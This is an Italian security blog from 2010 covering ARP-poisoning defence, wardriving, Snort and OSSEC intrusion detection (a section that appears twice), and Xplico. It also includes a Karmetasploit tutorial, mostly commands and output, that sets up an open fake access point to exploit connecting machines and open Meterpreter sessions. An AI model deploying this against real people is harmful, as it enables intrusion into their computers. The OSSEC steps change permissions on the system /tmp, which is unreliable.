Arpon è un software sviluppato da un programmatore catanese, che rileva e blocca i tentativi di attacco di tipo arp poisoning, utilizzando due tipi di tecniche anti arp poisoning SARPI o "Static Arp Ispezione" e DARPI o "approccio dinamico Arp di controllo.Si può installare su ubuntu direttamente tramite repository, per maggiori informazioni sul suo utilizzo e del man dei vari comandi visitate il sito Arpon.
lunedì 10 maggio 2010
sabato 8 maggio 2010
OSRW
La community di Backtrack ha aperto ufficialmente il progetto Osservatorio Sicurezza delle Reti Wireless, il progetto consiste nel promuovere e informare gli utenti che utilizzano reti wireless dei rischi che corrono per una cattiva gestione della loro rete wifi, come per esempio lasciare la propria rete wifi open o con la crittografia wep. Potete partecipare al progetto inviando i risultati delle vostre sessioni di wardriving della propria città. Per maggiori informazioni visitate il sito italiano di backtrack OSRW.
Etichette:
sicurezza,
wardriving
martedì 6 aprile 2010
IDS Intrusion detection system
Ho parlato delle tecniche di attacco verso host e server, oggi parlo come difendersi da attacchi provenienti dalla rete utilizzando snort e ossec con web gui, sono dei intrusion detection system, cioè dei software che rilevano o anche bloccano molti attacchi che provengono da internet e scansioni con port scanner . Installiamo snort su ubuntu server da gestore pacchetti synaptics o su qualsiasi distro linux compilando i sorgenti seguendo questa guida Installare e configurare Snort, una volta installato snort dobbiamo configurarlo e caricare i rules opensource dal sito di emergingthreats, modifichiamo il file conf di snort da shell logati come root
sudo nano /etc/snort/snort.conf
modifichiamo la variabile var EXTERNAL_NET any togliendo any e mettendo !$HOME_NET, con questo comando snort rileva gli indirizzi ip esterni alla nostra rete LAN, dopo installiamo oinkmaster che ci permetterà di scaricare le rules dal sito di emergingthreats
sudo apt-get install oinkmaster
modifichiamo il suo file conf
sudo nano /etc/oinkmaster.conf
e inseriamo sotto a #url = http://www.snort.org/dl/rules/snortrules-snapshot-2_2.tar.gz commentandolo noi l'url di emergingthreats url =
http://www.emergingthreats.net/rules/emerging.rules.tar.gz, salviamo e inseriamo in /etc/snort/snort.conf questo:
# Emergin rules
var SSH_PORTS 22
include $RULE_PATH/emerging-attack_response.rules
include $RULE_PATH/emerging-botcc.rules
include $RULE_PATH/emerging-compromised.rules
include $RULE_PATH/emerging-dos.rules
include $RULE_PATH/emerging-drop.rules
include $RULE_PATH/emerging-dshield.rules
include $RULE_PATH/emerging-exploit.rules
include $RULE_PATH/emerging-game.rules
include $RULE_PATH/emerging-inappropriate.rules
include $RULE_PATH/emerging-malware.rules
include $RULE_PATH/emerging-p2p.rules
include $RULE_PATH/emerging-policy.rules
include $RULE_PATH/emerging-rbn.rules
include $RULE_PATH/emerging.rules
include $RULE_PATH/emerging-scan.rules
include $RULE_PATH/emerging-virus.rules
include $RULE_PATH/emerging-voip.rules
include $RULE_PATH/emerging-web.rules
include $RULE_PATH/emerging-web_sql_injection.rules
# Fine emergin rules
scarichiamo le rules sulla cartella /etc/snort/rules con questo comando
/usr/sbin/oinkmaster -o /etc/snort/rules
bene non ci resta che riavviare snort con /etc/init.d/snort restart e proviamo se funziona effettuando qualche scansione DoS sul nostro web server, il log file di snort si trova in /var/log/snort chiamato "alert" ovviamente!
Se tutto va bene installiamo ossec insieme alla sua web gui, un'altro ottimo IDS che serve per analizzare in tempo reale tutti i files log di sistema compresi quelli di snort e apache2, ricerca di rootkit, monitoraggio e applicazione della policy, segnalazione di situazioni sospette o critiche tramite email ed è altamente personalizzabile.
Installiamo ossec seguendo le guide sul suo sito, scaricando e estrando i suoi files
root@ubuntu:~# wget http://www.ossec.net/files/ossec-hids-latest.tar.gz
root@ubuntu:~# tar -zxvf ossec-hids-*.tar.gz (or gunzip -d; tar -xvf)
root@ubuntu:~# cd ossec-hids-*
root@ubuntu:~# ./install.sh
ci chiederà quale versione installare Server, Agent o Local, se è per fare delle prove sulla vostra rete LAN vi consiglio d'installare la versione local, comunque la procedura di installazione è guidata e anche in italiano. Installazione ultimata avviamo ossec con questo comando
root@ubuntu:~# /var/ossec/bin/ossec-control start
se si avvia e funziona passiamo all'installazione della sua web gui, come per ossec scarichiamola, estraiamola e spostiamola in /var/www/
root@ubuntu:~# wget http://www.ossec.net/files/ui/ossec-wui-0.3.tar.gz
root@ubuntu:~# tar -zxvf ossec-wui-0.3.tar.gz
root@ubuntu:~# mv ossec-wui-0.3 /var/www/ossec-wui-0.3
passiamo all'installazione della web-gui
root@ubuntu:~# cd /var/www/ossec-wui-0.3
root@ubuntu:~# ./setup.sh
adesso aggiungiamo www-data sull'user di ossec su nano /etc/group/ cosi ossec:x:1001:www-data, diamo i permessi alla cartella /tmp che si trova in /var/www/ossec-wui-0.3 cosi
root@ubuntu:/var/www/ossec-wui-0.3# chmod 770 /tmp
root@ubuntu:/var/www/ossec-wui-0.3# chown www-data:www-data /tmp
infine modifichiamo il php.ini di PHP installato insieme con Apache2 sostituendo questi valori
bene abbiamo finito, riavviamo apache2 e utiliziamo ossec con la web-gui, scrivendo nel nostro browser http://localhost/ossec-wui-0.3.
sudo nano /etc/snort/snort.conf
modifichiamo la variabile var EXTERNAL_NET any togliendo any e mettendo !$HOME_NET, con questo comando snort rileva gli indirizzi ip esterni alla nostra rete LAN, dopo installiamo oinkmaster che ci permetterà di scaricare le rules dal sito di emergingthreats
sudo apt-get install oinkmaster
modifichiamo il suo file conf
sudo nano /etc/oinkmaster.conf
e inseriamo sotto a #url = http://www.snort.org/dl/rules/snortrules-snapshot-2_2.tar.gz commentandolo noi l'url di emergingthreats url =
http://www.emergingthreats.net/rules/emerging.rules.tar.gz, salviamo e inseriamo in /etc/snort/snort.conf questo:
# Emergin rules
var SSH_PORTS 22
include $RULE_PATH/emerging-attack_response.rules
include $RULE_PATH/emerging-botcc.rules
include $RULE_PATH/emerging-compromised.rules
include $RULE_PATH/emerging-dos.rules
include $RULE_PATH/emerging-drop.rules
include $RULE_PATH/emerging-dshield.rules
include $RULE_PATH/emerging-exploit.rules
include $RULE_PATH/emerging-game.rules
include $RULE_PATH/emerging-inappropriate.rules
include $RULE_PATH/emerging-malware.rules
include $RULE_PATH/emerging-p2p.rules
include $RULE_PATH/emerging-policy.rules
include $RULE_PATH/emerging-rbn.rules
include $RULE_PATH/emerging.rules
include $RULE_PATH/emerging-scan.rules
include $RULE_PATH/emerging-virus.rules
include $RULE_PATH/emerging-voip.rules
include $RULE_PATH/emerging-web.rules
include $RULE_PATH/emerging-web_sql_injection.rules
# Fine emergin rules
scarichiamo le rules sulla cartella /etc/snort/rules con questo comando
/usr/sbin/oinkmaster -o /etc/snort/rules
bene non ci resta che riavviare snort con /etc/init.d/snort restart e proviamo se funziona effettuando qualche scansione DoS sul nostro web server, il log file di snort si trova in /var/log/snort chiamato "alert" ovviamente!
Se tutto va bene installiamo ossec insieme alla sua web gui, un'altro ottimo IDS che serve per analizzare in tempo reale tutti i files log di sistema compresi quelli di snort e apache2, ricerca di rootkit, monitoraggio e applicazione della policy, segnalazione di situazioni sospette o critiche tramite email ed è altamente personalizzabile.
Installiamo ossec seguendo le guide sul suo sito, scaricando e estrando i suoi files
root@ubuntu:~# wget http://www.ossec.net/files/ossec-hids-latest.tar.gz
root@ubuntu:~# tar -zxvf ossec-hids-*.tar.gz (or gunzip -d; tar -xvf)
root@ubuntu:~# cd ossec-hids-*
root@ubuntu:~# ./install.sh
ci chiederà quale versione installare Server, Agent o Local, se è per fare delle prove sulla vostra rete LAN vi consiglio d'installare la versione local, comunque la procedura di installazione è guidata e anche in italiano. Installazione ultimata avviamo ossec con questo comando
root@ubuntu:~# /var/ossec/bin/ossec-control start
se si avvia e funziona passiamo all'installazione della sua web gui, come per ossec scarichiamola, estraiamola e spostiamola in /var/www/
root@ubuntu:~# wget http://www.ossec.net/files/ui/ossec-wui-0.3.tar.gz
root@ubuntu:~# tar -zxvf ossec-wui-0.3.tar.gz
root@ubuntu:~# mv ossec-wui-0.3 /var/www/ossec-wui-0.3
passiamo all'installazione della web-gui
root@ubuntu:~# cd /var/www/ossec-wui-0.3
root@ubuntu:~# ./setup.sh
adesso aggiungiamo www-data sull'user di ossec su nano /etc/group/ cosi ossec:x:1001:www-data, diamo i permessi alla cartella /tmp che si trova in /var/www/ossec-wui-0.3 cosi
root@ubuntu:/var/www/ossec-wui-0.3# chmod 770 /tmp
root@ubuntu:/var/www/ossec-wui-0.3# chown www-data:www-data /tmp
infine modifichiamo il php.ini di PHP installato insieme con Apache2 sostituendo questi valori
max_execution_time = 180
max_input_time = 180
memory_limit = 30M
bene abbiamo finito, riavviamo apache2 e utiliziamo ossec con la web-gui, scrivendo nel nostro browser http://localhost/ossec-wui-0.3.
martedì 9 marzo 2010
Fake AP con Karmetasploit
Ci sono vari modi per creare un AP falso, che potrebbe essere utile per fare delle prove per testare le keys wep o wpa. Nel tool di Gerix-Wifi-Cracker c'è una opzione che permette di creare un AP falso impostando il tipo di crittografia e la password, ovviamente dovreste avere almeno due scheda wireless, una serve per creare l'AP l'altra per craccarlo. Potremo anche crearlo personalmente seguendo questa guida presa dal forum italiano di remote-exploit Come creare un AP falso con tua scheda wifi, vediamo ora come crearlo con karmetasploit un tool sviluppato dallo stesso team di metasploit, karma creerà un fake AP senza password quindi open che chiunque potrà collegarsi, quando un pc si collegherà all'AP karma invierà una serie di exploits nel pc vittima per ottenere una sessione di meterpreter. Passiamo ora all'installazione e configurazione di karma!
Scarichiamo karma dal sito di metasploit
root@morfes:/opt/metasploit3/msf3# wget "http://metasploit.com/users/hdm/tools/karma.rc"
--2009-05-04 18:43:26-- http://metasploit.com/users/hdm/tools/karma.rc
Resolving metasploit.com... 66.240.213.81
Connecting to metasploit.com|66.240.213.81|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1088 (1.1K) [text/plain]
Saving to: `karma.rc'
100%[============================================================================>] 1,088 --.-K/s in 0s
(88.7 MB/s) - `karma.rc' saved [1088/1088]modifichiamo il file dhcp.conf inserendo questi comandi, ah prima facciamo un backup del file
root@morfes:~# nano /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}installiamo dei requisiti che servono a karma
root@morfes:~# gem install activerecord sqlite3-ruby
Successfully installed activerecord-2.3.2
Building native extensions. This could take a while...
Successfully installed sqlite3-ruby-1.2.4
2 gems installed
Installing ri documentation for activerecord-2.3.2...
Installing ri documentation for sqlite3-ruby-1.2.4...
Installing RDoc documentation for activerecord-2.3.2...
Installing RDoc documentation for sqlite3-ruby-1.2.4...mettiamo in modalità monitor con airmon-ng una delle nostre schede wifi e avviamo airbase-ng per creare l'AP falso
root@morfes:~# airmon-ng
Interface Chipset Driver
wlan0 Broadcom b43 - [phy0]
root@morfes:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Broadcom b43 - [phy0]
(monitor mode enabled on mon0)
root@morfes:~# airbase-ng -P -C 30 -e "Morfes" -v mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
22:52:25 Created tap interface at0
22:52:25 Trying to set MTU on at0 to 1500
22:52:25 Trying to set MTU on ath1 to 1800
22:52:25 Access Point with BSSID 00:1A:4D:49:0B:26 started.impostiamo l'ip per la nostra nuova interfaccia di rete at0 e attiviamo il DHCP Server
root@morfes:~# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@morfes:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/at0/00:1a:4d:49:0b:26/10.0.0/24
Sending on LPF/at0/00:1a:4d:49:0b:26/10.0.0/24
Sending on Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.
root@morfes:~# ps aux | grep dhcpd
dhcpd 6490 0.0 0.1 3812 1840 ? Ss 22:55 0:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
root 6493 0.0 0.0 3232 788 pts/0 S+ 22:55 0:00 grep dhcpde infine avviamo karma
root@morfes:/opt/metasploit3/msf3# ./msfconsole -r karma.rc
Vi ricordo che questo è un tutorial dimostrativo, tutto ciò deve essere fatto nella vostra rete lan! Vi ricordo inoltre che entrare in una rete wifi altrui anche se open è illegale, anche perchè come dimostrato nell'articolo se entrate in una rete wifi open creata da qualche cracker potete diventare delle possibile vittime! :)
Etichette:
backtrack,
fake ap,
karmetasploit
sabato 6 marzo 2010
Xplico
Xplico ora è anche su backtrack! Xplico è un Network Forensic Analysis Tool (NFAT), ovvero un software che riesce a ricostruire i contenuti dei pacchetti catturati tramite l'utilizzo di packet sniffer come Wireshark e Tcpdump o anche con Xplico stesso, infatti Xplico oltre che ricostruire i pacchetti pcap ha pure la funzione di sniffer. Xplico riesce a ricostruire tutti i dati trasportati dai protocolli come HTTP, IMAP, POP, SMTP, SIP "voip", FTP e TELNET, anche ricostruire le email scambiate e le chat come facebook. Il software è sviluppato da Gianluca Costa e Andrea de Franceschi, rilasciato sotto licenza Open Source ed è installabile solo su Linux. Per avere maggiori informazioni su come installarlo su altre distro linux visitate il wiki del sito ufficiale di Xplico. Tramite il mio video vi faccio vedere come installarlo su backtrack e come funziona con un semplice esempio di sniffer del protocollo HTTP tramite la sua interfaccia web.
